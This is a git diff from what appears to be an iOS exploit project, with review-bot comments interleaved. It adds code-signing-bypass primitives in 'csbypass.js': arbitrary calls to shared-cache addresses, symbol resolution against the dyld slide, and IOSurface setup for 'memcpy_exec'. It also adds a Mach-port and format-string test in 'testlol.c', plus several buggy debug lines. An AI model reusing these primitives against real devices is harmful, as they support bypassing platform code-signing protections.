| -rw-r--r-- | src/js/csbypass.js | 26 | ||||
| -rwxr-xr-x | tools/testlol.c | 12 |
2 files changed, 35 insertions, 3 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js index e91dac3..9be80c4 100644 --- a/src/js/csbypass.js +++ b/src/js/csbypass.js @@ -7,6 +7,12 @@ var kCFTypeDictionaryValueCallBacks_addr = 0x343c79fc; var CFDictionarySetValue_addr = 0x2080a791; var CFNumberCreate_addr = 0x2080bc79; var kCFNumberSInt32Type = 3; +var CFShow_addr = 0x208e897c | 1; + +var my_kIOSurfaceBytesPerRow; +var my_kIOSurfaceWidth; +var my_kIOSurfaceHeight; +var my_kIOSurfacePixelFormat; function csbypass() { printf("hello from csbypass!\n"); 
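Review bot: `var CFShow_addr = 0x208e897c | 1;` hard-codes a shared-cache address at the same time this commit's linkIOSurface() hunk stops hard-coding CFDictionarySetValue_addr and resolves it with dlsym; resolving CFShow the same way would keep the two consistent and not silently break on another cache build. The `| 1` presumably sets a low address bit for the call mechanism — a short comment saying why would spare the next reader a guess. The four `my_kIOSurface*` globals are declared here without a value and dereferenced with `read_u32(...)` in memcpy_exec, while the assignment is not visible in this diff; if they are set in linkIOSurface(), a comment such as `// filled in by linkIOSurface()` would make the ordering dependency explicit.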
@@ -19,17 +25,27 @@ function memcpy_exec(dst, src, size) {
 var width = malloc(4);
 var height = malloc(4);
 var pitch = malloc(4);
- var pixel_format = malloc(4);
+ var pixel_format = malloc(5);
 write_u32(width, PAGE_SIZE / (16 * 4));
 write_u32(height, 16);
 write_u32(pitch, read_u32(width) * 4);
 write_u32(pixel_format, 0x42475241); // ARGB
- dict = callnarg(CFDictionaryCreateMutable_addr + get_dyld_shc_slide(), 0, 0, kCFTypeDictionaryKeyCallBacks_addr, kCFTypeDictionaryValueCallBacks_addr);
+ write_u32(pixel_format + 4, 0x0); // ARGB
+ printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue"));
+ dict = callnarg(CFDictionaryCreateMutable_addr + get_dyld_shc_slide(), 0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
 printf("dict: %p\n", dict);
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pitch));
+ var test = callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pitch);
+ printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
+ scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
+ callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
+ callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), test);
+ printf("fuck1\n");
 callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
+ printf("fuck2\n");
callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceHeight), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height)); + printf("fuck3\n"); callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfacePixelFormat), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format)); + printf("fuck4\n"); printf("fuck you\n"); printf("%d\n", callnarg(my_IOSurfaceAcceleratorCreate, 0, 0, accel)); } @@ -47,6 +63,10 @@ function linkIOSurface() { my_IOSurfaceAcceleratorCreate = dlsym(h, "IOSurfaceAcceleratorCreate"); my_IOSurfaceCreate = dlsym(h, "IOSurfaceCreate"); my_IOSurfaceAcceleratorTransferSurface = dlsym(h, "IOSurfaceAcceleratorTransferSurface"); + + CFDictionarySetValue_addr = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue") - get_dyld_shc_slide(); + + scall("printf", "%x %x %x\n", my_IOSurfaceAcceleratorCreate, my_IOSurfaceCreate, my_IOSurfaceAcceleratorTransferSurface); } function poc() { diff --git a/tools/testlol.c b/tools/testlol.c index 526895b..b957a93 100755 --- a/tools/testlol.c +++ b/tools/testlol.c @@ -107,7 +107,19 @@ kern_return_t send_ports(mach_port_t target, mach_port_t payload, size_t num, ma return ret;
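Review bot: `var pixel_format = malloc(5);` is paired with `write_u32(pixel_format + 4, 0x0);`, which stores four bytes at offset 4 of a five-byte allocation and so writes three bytes past its end; if the trailing zero word is wanted, the allocation has to be `var pixel_format = malloc(8);`. The `// ARGB` comment copied onto that zero-write describes the previous line, not this one, and should be dropped or replaced by what the padding is for. The `fuck1`…`fuck4` and `fuck you test=` prints, the `%x %x` comparison of the hard-coded address against dlsym, the `read_u32(dict)` peek and the `scall("printf", ...)` dump of the first sixteen bytes at CFDictionarySetValue are debugging scaffolding that should not land in the mainline path; either remove them or gate them behind a debug flag. The enclosing function (memcpy_exec per the hunk header) begins outside the hunk.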
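Review bot: The new `CFDictionarySetValue_addr = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue") - get_dyld_shc_slide();` in linkIOSurface() never checks that dlopen or dlsym succeeded; if either returns 0 the stored value is just the negated slide, and the later `callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), ...)` in memcpy_exec ends up calling address 0 with no diagnostic. Resolve into a local first and bail out on failure: `var p = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue");` / `if (!p) { printf("dlsym CFDictionarySetValue failed\n"); return; }` / `CFDictionarySetValue_addr = p - get_dyld_shc_slide();`. The subtract-then-add round trip through the slide only exists to fit the `_addr + get_dyld_shc_slide()` convention used by the other callers, which a comment on this line should say. The added `scall("printf", "%x %x %x\n", ...)` dump of the three IOSurface function pointers is debug output and belongs behind the same debug switch as the prints in memcpy_exec.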
}
+struct test {
+ int a;
+ int b;
+ char* c;
+};
+
int main(int argc, char* argv[]) {
+ struct test d;
+ d.a = 1;
+ d.b = 2;
+ d.c = "Hello, world!\n";
+ printf("%x %x %x %x %x %x %x %x\n", d, 0x41414141, 0x41424344);
+ return;
printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE);
printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND);
printf("var MACH_PORT_LIMITS_INFO = 0x%x;\n", MACH_PORT_LIMITS_INFO);
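Review bot: `return;` inside `int main(int argc, char* argv[])` is a return without a value from a non-void function, which C99 forbids outright, and it also turns every `printf("var MACH_...")` line that follows into dead code; if the early exit is intentional it should be `return 0;` with the generator lines removed or moved behind a flag, otherwise the line should go. The preceding `printf("%x %x %x %x %x %x %x %x\n", d, 0x41414141, 0x41424344);` is undefined behaviour twice over: `%x` cannot consume a `struct test` argument, and eight conversions are supplied with three arguments, so the remaining five read whatever happens to be in the argument slots (`-Wformat` reports both). If the intent is to see the struct's contents, print the fields explicitly: `printf("%x %x %p\n", d.a, d.b, (void *)d.c);`. `char* c` holding a string literal should be `const char *c` so a later write through it is rejected at compile time rather than faulting at run time.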
